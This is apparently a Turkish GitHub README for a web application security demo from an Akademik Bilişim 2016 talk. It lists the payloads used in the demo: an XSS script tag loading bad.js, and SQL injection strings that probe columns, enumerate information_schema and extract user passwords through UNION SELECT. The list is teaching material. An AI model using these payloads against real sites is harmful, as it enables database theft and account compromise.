Fetching latest commit…
ab16WebUygulamaGuvenligi
Akademik Bilişim 2016 kapsamındaki Web Uygulama Güvenliği sunumunda demo yaptığım sistem.
Sunum : http://www.slideshare.net/Om3rCitak/web-uygulama-gvenlii-akademik-biliim-2016-57851287
Demoda Kullanılan Payloadlar
XSS
<script src='http://127.0.0.1/demo_xss_sql/hack/bad.js'></script>Sql Injection
' or true #
' and 1=1
' and 1=2
' order by 3
-{id} union select 1,2,3
-{id} union select 1,database(),3
-{id} union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='bitcs'
-{id} union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='bitcs' and table_name='users'
-{id} union select 1,password,3 from users where id=1
-{id} union select 1,password,3 from users where username='omercitak'